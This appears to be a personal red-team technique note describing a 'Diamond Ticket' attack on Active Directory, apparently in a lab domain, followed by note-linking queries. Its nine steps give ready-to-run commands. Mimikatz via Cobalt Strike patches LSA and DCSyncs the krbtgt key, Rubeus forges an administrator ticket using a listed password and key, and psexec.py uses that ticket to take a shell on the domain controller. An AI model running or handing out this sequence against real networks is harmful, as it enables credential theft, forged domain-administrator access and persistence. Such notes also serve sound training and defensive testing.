Diamond Ticket

Technique Info

Diamond Ticket with Cobalt Strike and Rubeus.exe

1. Use Cobalt Strike’s mimikatz beacon command to patch lsa: mimikatz !lsadump::lsa /patch
2. Use Cobalt Strike’s mimikatz beacon command to retrieve the krbtgt users AES256 key: mimikatz !lsadump::dcsync /user:dcorp\krbtgt
3. Create the Diamond Ticket: execute-assembly /home/jorkle/Rubeus.exe diamond /krbkey:6a740ddbe25b6ea352b49fea0f6c8d3eb72104d152d6aca9d5c159b31f8a08d8 /user:robb.stark /password:sexywolfy /enctype:aes /ticketuser:administrator /domain:north.sevenkingdoms.local /dc:winterfell.north.sevenkingdoms.local /ticketuserid:500 /groups:512 /createnetonly:C:\Windows\System32\cmd.exe /nowrap
4. Copy the line highlighted in red from the output (base64 encoded kirbi diamond ticket)
5. Run the following command: echo "<base64 kirbi diamond ticket>" | base64 -d > ticket.kirbi
6. Use ticketConverty.py to convert the kirbi ticket to ccache ticketConverter.py ./ticket.kirbi ./ticket.ccache
7. Configure your kerberos env variable export KRB5CCNAME="$(pwd)/ticket.ccache"
8. Ensure your clock is synced with the server sudo ntpdate 192.168.58.11
9. access server with diamond ticket (use @full-dc-fqdn) psexec.py north.sevenkingdoms.local/administrator@winterfell.north.sevenkingdoms.local -k -no-pass -target-ip 192.168.58.11

Related

Related Notes

All Related Notes

TABLE file.ctime as "Created", tags as "Tags"
FROM "New Notes"
WHERE contains(tags, "windows") OR contains(tags, "active-directory") OR contains(tags, "persistence")
SORT file.ctime DESC

windows

TABLE file.ctime as "Created", tags as "Tags"
FROM "New Notes"
WHERE contains(tags, "windows")
SORT file.ctime DESC

active-directory

TABLE file.ctime as "Created", tags as "Tags"
FROM "New Notes"
WHERE contains(tags, "active-directory")
SORT file.ctime DESC

persistence

TABLE file.ctime as "Created", tags as "Tags"
FROM "New Notes"
WHERE contains(tags, "persistence")
SORT file.ctime DESC